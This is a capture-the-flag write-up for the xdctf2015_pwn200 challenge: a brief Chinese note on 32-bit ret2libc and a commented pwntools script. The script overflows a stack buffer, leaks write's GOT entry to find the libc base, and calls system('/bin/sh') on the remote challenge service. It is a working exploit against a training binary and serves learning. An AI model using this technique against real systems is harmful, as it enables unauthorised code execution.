xdctf2015_pwn200
32位ret2libc
还是要注意：覆盖返回地址（写入被调用函数的地址）之后，要紧接着放该函数的返回地址，然后才是它的参数。
# Solution script for the xdctf2015_pwn200 exercise: a two-stage 32-bit
# ret2libc against the binary ./bof, run against the hosted challenge instance.
#   Stage 1 makes the program call write(1, write@got, 4) so it prints the
#           runtime address of write(), then returns to main.
#   Stage 2 uses that leak to compute the libc base and returns into
#           system() with a pointer to libc's "/bin/sh" string.
#
# NOTE(review): both payloads concatenate a str with the result of p32(), and
# the string search uses .next(); these are Python 2 idioms, so the script
# appears to be written for Python 2 -- confirm the interpreter before reuse.
#
# Defensive reading: the script uses elf.plt / elf.sym values directly as
# absolute addresses and reaches the saved return address with plain padding.
# That suggests the target was built without PIE and without a stack
# protector (not shown here -- verify with checksec). Enabling either one
# would invalidate the assumptions this script makes.
from pwn import *
# Connect to the remote challenge service.
io=remote("node4.buuoj.cn",29550)
# Local copy of the challenge binary, used only to look up symbol addresses.
elf=ELF("./bof")
write_plt=elf.plt['write']    # PLT stub for write(): callable entry point
write_got=elf.got['write']    # GOT slot that holds write()'s resolved address
main_addr=elf.sym['main']     # return target, so the overflow can be triggered twice
# Consume the banner before sending the first payload.
io.recvuntil("Welcome to XDCTF2015~!\n")
# Stage 1 layout (32-bit: arguments are passed on the stack):
#   padding | write@plt | return address for write (main) | fd=1 | buf=write@got | len=4
# The padding length is 0x6c+0x4 bytes -- presumably the buffer's distance
# from the saved frame pointer plus the 4-byte saved frame pointer; confirm
# against the disassembly of ./bof.
payload='a'*(0x6c+0x4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
# The 4 bytes received here are the contents of write's GOT slot,
# i.e. the runtime address of write() in the loaded libc.
write_addr=u32(io.recv(4))
# Discard whatever else is pending (presumably the banner printed again
# after control returned to main).
io.recv()
# Offsets below are only valid if this file is the same libc build the
# target process has loaded.
libc=ELF("./libc-2.23(32).so")
libc_sys=libc.sym['system']
libc_write=libc.sym['write']
# Offset of the first "/bin/sh\0" string inside the libc file.
libc_bin=libc.search('/bin/sh\x00').next()
# leaked runtime address - file offset of the same symbol = libc load base
libcbase=write_addr-libc_write
sys_addr=libcbase+libc_sys
bin_addr=libcbase+libc_bin
# Stage 2 layout, same padding as stage 1:
#   padding | system | return address for system (main) | arg0 = "/bin/sh"
payload='a'*(0x6c+0x4)+p32(sys_addr)+p32(main_addr)+p32(bin_addr)
io.sendline(payload)
# Hand the connection over to the terminal.
io.interactive()

                
            
        